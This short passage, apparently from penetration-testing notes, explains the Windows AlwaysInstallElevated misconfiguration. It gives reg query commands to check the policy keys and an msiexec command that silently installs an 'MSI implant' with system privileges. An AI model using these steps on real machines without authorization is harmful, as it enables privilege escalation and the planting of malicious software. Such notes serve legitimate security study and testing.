If this registry key is set, all MSI packages are ran with system privileges. We can query this with:

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

If this is set to 1, then this settings is active.

We can then execute our MSI implant file like this:

msiexec /quiet /qn /i c:\executable.msi

Last updated